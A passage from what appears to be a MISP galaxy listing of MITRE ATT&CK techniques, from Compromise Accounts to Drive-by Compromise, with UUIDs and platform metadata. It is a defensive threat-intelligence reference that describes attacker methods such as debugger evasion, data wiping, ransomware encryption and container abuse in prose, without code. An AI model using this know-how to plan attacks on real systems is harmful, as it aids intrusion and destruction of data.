A variety of methods exist for compromising accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[AnonHBGary][Microsoft DEV-0537] Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for Phishing for Information or Phishing.

Internal MISP references

UUID c6374cbe-799a-4648-b1e2-2a66bb42d3f3 which can be used as unique global reference for Compromise Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Compromise Host Software Binary

Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.

Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.

An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)[Unit42 Banking Trojans Hooking 2022] prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.[ESET FontOnLake Analysis 2021]

Internal MISP references

UUID 05435e33-05fe-4a41-b8e4-694d45eb9147 which can be used as unique global reference for Compromise Host Software Binary in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Compromise Infrastructure

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.[Mandiant APT1][ICANNDomainNameHijacking][Talos DNSpionage Nov 2018][FireEye EPS Awakens Part 2] Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with Digital Certificates) to further blend in and support staged information gathering and/or Phishing campaigns.[FireEye DNS Hijack 2019] Additionally, adversaries may also compromise infrastructure to support Proxy and/or proxyware services.[amnesty_nso_pegasus][Sysdig Proxyjacking]

By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.[NSA NCSC Turla OilRig]

Internal MISP references

UUID c12d81d3-abe4-43d7-8a65-f4b3150e722d which can be used as unique global reference for Compromise Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Container Administration Command

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.[Docker Daemon CLI][Kubernetes API][Kubernetes Kubelet]

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.[Docker Entrypoint][Docker Exec] In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.[Kubectl Exec Get Shell]

Internal MISP references

UUID 0b9609dd-9f19-4747-ba6e-421b6b7ff03f which can be used as unique global reference for Container Administration Command in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Container and Resource Discovery

Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.[Docker API][Kubernetes API] In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

Internal MISP references

UUID 41c4b4cc-99da-4323-b0f4-229906578501 which can be used as unique global reference for Container and Resource Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Content Injection

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems.[ESET MoustachedBouncer]

Adversaries may inject content to victim systems in various ways, including:

  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar but distinct from Adversary-in-the-Middle, which describes AiTM activity solely within an enterprise environment) [Kaspersky Encyclopedia MiTM]
  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server [Kaspersky ManOnTheSide]

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."[Kaspersky ManOnTheSide][ESET MoustachedBouncer][EFF China GitHub Attack]

Internal MISP references

UUID 3f95e4f2-cd4a-502c-a12a-becb8d28440c which can be used as unique global reference for Content Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Create Account

Adversaries may create an account to maintain access to victim systems.[Symantec WastedLocker June 2020] With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

Internal MISP references

UUID 55bcf759-a0bf-47e9-99f8-4e8ca997e6ce which can be used as unique global reference for Create Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Create or Modify System Process

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.[TechNet Services] On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters.[AppleDocs Launch Agent Daemons]

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.[OSX Malware Detection]

Internal MISP references

UUID f8aa018b-5134-4201-87f2-e55d20f40b17 which can be used as unique global reference for Create or Modify System Process in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Credentials from Password Stores

Adversaries may search for common password storage locations to obtain user credentials.[F-Secure The Dukes] Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

Internal MISP references

UUID a0bb264e-8617-4ae6-bafd-f52b36c63d12 which can be used as unique global reference for Credentials from Password Stores in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Destruction

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018][Talos Olympic Destroyer 2018] Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.[Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018] In some cases politically oriented image files have been used to overwrite data.[FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017]

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Talos Olympic Destroyer 2018].

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.[Data Destruction - Threat Post][DOJ - Cisco Insider]

Internal MISP references

UUID e5016c2b-85fe-4e6b-917d-0dd5b441cc34 which can be used as unique global reference for Data Destruction in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Encoding

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.[Wikipedia Binary-to-text Encoding] [Wikipedia Character Encoding] Some data encoding systems may also result in data compression, such as gzip.

Internal MISP references

UUID 7d8af4f3-7d8e-4ef2-b828-40a910fc6188 which can be used as unique global reference for Data Encoding in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Encrypted for Impact

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.[US-CERT Ransomware 2016][FireEye WannaCry 2017][US-CERT NotPetya 2017][US-CERT SamSam 2018]

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as File and Directory Permissions Modification or System Shutdown/Reboot, in order to unlock and/or gain access to manipulate these files.[CarbonBlack Conti July 2020] In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.[US-CERT NotPetya 2017]

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[FireEye WannaCry 2017][US-CERT NotPetya 2017] Encryption malware may also leverage Internal Defacement, such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").[NHS Digital Egregor Nov 2020]

In cloud environments, storage objects within compromised accounts may also be encrypted.[Rhino S3 Ransomware Part 1]

Internal MISP references

UUID f0c36d24-263c-4811-8784-f716c77ec6b3 which can be used as unique global reference for Data Encrypted for Impact in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Cloud Storage

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the Cloud API. In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., Data from Information Repositories).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.[Amazon S3 Security, 2019][Microsoft Azure Storage Security, 2019][Google Cloud Storage Best Practices, 2019] There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.[Trend Micro S3 Exposed PII, 2017][Wired Magecart S3 Buckets, 2019][HIPAA Journal S3 Breach, 2017][Rclone-mega-extortion_05_2021]

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

Internal MISP references

UUID 77069b3f-9e42-4f1b-894f-8df568233df2 which can be used as unique global reference for Data from Cloud Storage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Configuration Repository

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.[US-CERT-TA18-106A][US-CERT TA17-156A SNMP Abuse 2017]

Internal MISP references

UUID 97ef6135-47d4-4b91-8783-c0b5f331340e which can be used as unique global reference for Data from Configuration Repository in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Information Repositories

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

  • Policies, procedures, and standards
  • Physical / logical network diagrams
  • System architecture diagrams
  • Technical system documentation
  • Testing / development credentials
  • Work / project schedules
  • Source code snippets
  • Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as Sharepoint and Confluence, specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

Internal MISP references

UUID 08a73f37-a04e-46be-9409-b330cbe291b4 which can be used as unique global reference for Data from Information Repositories in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Local System

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a Command and Scripting Interpreter, such as cmd as well as a Network Device CLI, which have functionality to interact with the file system to gather information.[show_run_config_cmd_cisco] Adversaries may also use Automated Collection on the local system.

Internal MISP references

UUID c0e4f97b-f651-493f-9636-6ac2f6fb46fb which can be used as unique global reference for Data from Local System in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Network Shared Drive

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Internal MISP references

UUID 875c5aa3-6ab1-4717-9503-9818ccbad98a which can be used as unique global reference for Data from Network Shared Drive in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Removable Media

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Some adversaries may also use Automated Collection on removable media.

Internal MISP references

UUID ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766 which can be used as unique global reference for Data from Removable Media in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Manipulation

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.[Sygnia Elephant Beetle Jan 2022] By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID b77f03e8-f7d0-4d0f-8b79-4642d0fe2709 which can be used as unique global reference for Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Obfuscation

Adversaries may obfuscate command and control traffic to make it more difficult to detect.[Bitdefender FunnyDream Campaign November 2020] Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

Internal MISP references

UUID 57f95410-5735-43ae-9fec-8b628a7df985 which can be used as unique global reference for Data Obfuscation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Staged

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.[PWC Cloud Hopper April 2017]

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.[Mandiant M-Trends 2020]

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

Internal MISP references

UUID ef4ef020-5cd1-4859-902b-f207828a1281 which can be used as unique global reference for Data Staged in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Transfer Size Limits

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Internal MISP references

UUID dc98c882-8fba-4a10-bc6f-43088edb87af which can be used as unique global reference for Data Transfer Size Limits in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Debugger Evasion

Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.[ProcessHacker Github]

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to Virtualization/Sandbox Evasion, if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary, but may involve Native API function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).[hasherezade debug][AlKhaser Debug][vxunderground debug]

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping Native API function calls such as OutputDebugStringW().[wardle evilquest partii][Checkpoint Dridex Jan 2021]

Internal MISP references

UUID 945c1564-6c13-4baa-b1d4-6ba82e06a897 which can be used as unique global reference for Debugger Evasion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Defacement

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.

Internal MISP references

UUID 9a21c7c7-cf8e-4f05-b196-86ec39653e3b which can be used as unique global reference for Defacement in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Deobfuscate/Decode Files or Information

Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is the use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.[Malwarebytes Targeted Attack against Saudi Arabia] Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.[Carbon Black Obfuscation Sept 2016]

Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [Volexity PowerDuke November 2016]

Internal MISP references

UUID 88c2fb46-877a-4005-8425-7639d0da1920 which can be used as unique global reference for Deobfuscate/Decode Files or Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Deploy Container

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to Escape to Host and access other containers running on the node. [AppSecco Kubernetes Namespace Breakout 2020]

Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. [Docker Containers API][Kubernetes Dashboard][Kubeflow Pipelines] In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.[Kubernetes Workload Management] Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.[Aqua Build Images on Hosts]

Internal MISP references

UUID 2618638c-f6bd-4840-a297-c45076e094a9 which can be used as unique global reference for Deploy Container in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Develop Capabilities

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.[Mandiant APT1][Kaspersky Sofacy][Bitdefender StrongPity June 2020][Talos Promethium June 2020]

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

Internal MISP references

UUID bf660248-2098-499b-b90c-8c47efb26c70 which can be used as unique global reference for Develop Capabilities in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Device Driver Discovery

Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. Security Software Discovery) or other defenses (e.g., Virtualization/Sandbox Evasion), as well as potential exploitable vulnerabilities (e.g., Exploitation for Privilege Escalation).

Many OS utilities may provide information about local device drivers, such as driverquery.exe and the EnumDeviceDrivers() API function on Windows.[Microsoft Driverquery][Microsoft EnumDeviceDrivers] Information about device drivers (as well as associated services, i.e., System Service Discovery) may also be available in the Registry.[Microsoft Registry Drivers]

On Linux/macOS, device drivers (in the form of kernel modules) may be visible within /dev or using utilities such as lsmod and modinfo.[Linux Kernel Programming][lsmod man][modinfo man]

Internal MISP references

UUID 70ffc700-eb9b-54d7-8fd4-564bd71a6434 which can be used as unique global reference for Device Driver Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Direct Volume Access

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. [Hakobyan 2009]

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.[Github PowerSploit Ninjacopy] Adversaries may also use built-in or third-party utilities (such as vssadmin, wbadmin, and esentutl) to create shadow copies or backups of data from system volumes.[LOLBAS Esentutl]

Internal MISP references

UUID 447f1d32-31f7-44b5-834a-dcba8b038e7f which can be used as unique global reference for Direct Volume Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Disk Wipe

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Novetta Blockbuster Destructive Malware]

On network devices, adversaries may wipe configuration files and other data from the device using Network Device CLI commands such as erase.[erase_cmd_cisco]

Internal MISP references

UUID ea2b3980-05fd-41a3-8ab9-3106e833c821 which can be used as unique global reference for Disk Wipe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Domain or Tenant Policy Modification

Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.

Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.

With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include:

Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

Internal MISP references

UUID d092a9e1-63d0-415d-8cd0-666a261be5d9 which can be used as unique global reference for Domain or Tenant Policy Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Domain Trust Discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.[Microsoft Trusts] Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting.[AdSecurity Forging Trust Tickets][Harmj0y Domain Trusts] Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.[Harmj0y Domain Trusts] The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.[Microsoft Operation Wilysupply]

Internal MISP references

UUID 93bd112e-9494-4b60-bdc5-8b610c7ebe21 which can be used as unique global reference for Domain Trust Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Drive-by Compromise

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.

Multiple ways of delivering exploit code to a browser exist (i.e., Drive-by Target), including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
  • Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
  • Malicious ads are paid for and served through legitimate ad providers (i.e., Malvertising)
  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.[Shadowserver Strategic Web Compromise]

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.
  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
  3. Upon finding a vulnerable version, exploit code is delivered to the browser.
  4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
